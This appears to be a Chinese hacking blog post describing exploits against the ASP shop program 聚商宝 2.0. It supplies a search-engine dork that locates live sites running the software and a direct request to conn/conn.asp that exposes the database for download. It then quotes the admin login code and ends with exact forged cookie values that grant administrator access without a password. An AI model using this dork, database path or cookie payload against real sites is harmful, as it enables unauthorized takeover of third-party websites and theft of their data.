FROM http://www.st999.cn/blog BY 久久久电脑
程序:聚商宝2.0
下载:http://down.chinaz.com/soft/21754.htm
google关键字:intext:技术支持:奔明科技 聚商宝
前几天搞站的时候遇到了个程序叫聚商宝,把源码下载过来了,今天才有时间简单的看了看。。。
漏洞:暴库以及后台cookies欺骗
1)直接访问conn/conn.asp 暴出数据库地址,下载,解密,登录后台
2)cookies欺骗,admin文件夹下check.asp文件中的代码片段:
dim uid,upwd
uid=Replace_Text(Request.Form("userid"))
upwd=md5(Replace_Text(Request.Form("password")),16)
Verifycode=Replace_Text(request.Form("verifycode"))
if not isnumeric(Verifycode) then
Call Logerr()
Call ErroFy()
end if
if Cint(Verifycode)<>Session("SafeCode") then
Call ErroFy()
Sub ErroFy()
response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
response.write"<TR>"
response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>验证码错误!</div></td></tr>"
response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页</a></td>"
response.write"</tr>"
response.write"</table>"
Response.End()
End Sub
else
Set rs=server.createobject("adodb.recordset")
sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
rs.open sqltext,conn,1,1
If Rs.Eof And Rs.Bof Then
response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
response.write"<TR>"
response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>登陆名或密码不正确!</div></td></tr>"
response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页</a></td>"
response.write"</tr>"
response.write"</table>"
else
Response.Cookies("globalecmaster")=rs("username")
Response.Cookies("masterflag")=rs("flag")
Response.Cookies("adminid")=rs("id")
LastLogin=Date()
LastLoginIP=getIP()
sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where username='"&uid&"'"
conn.execute(sql)
response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
response.write"<TR>"
response.write"<TH class=tableHeaderText colSpan=2 height=25>登陆成功提示</TH>"
response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>成功通过网站后台管理员身份认证!<br><br>2秒后自动进入后台...</div></td></tr>"
response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>进入后台管理</a></td>"
response.write"</tr>"
response.write"</table>"
%>
<meta HTTP-EQUIV=refresh Content='2;url=index.asp'>
<%
end if
rs.close
set rs=nothing
end if
利用方法:用啊D直接访问后台,修改如下cookie,然后访问admin/index.asp登录。
globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%
2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1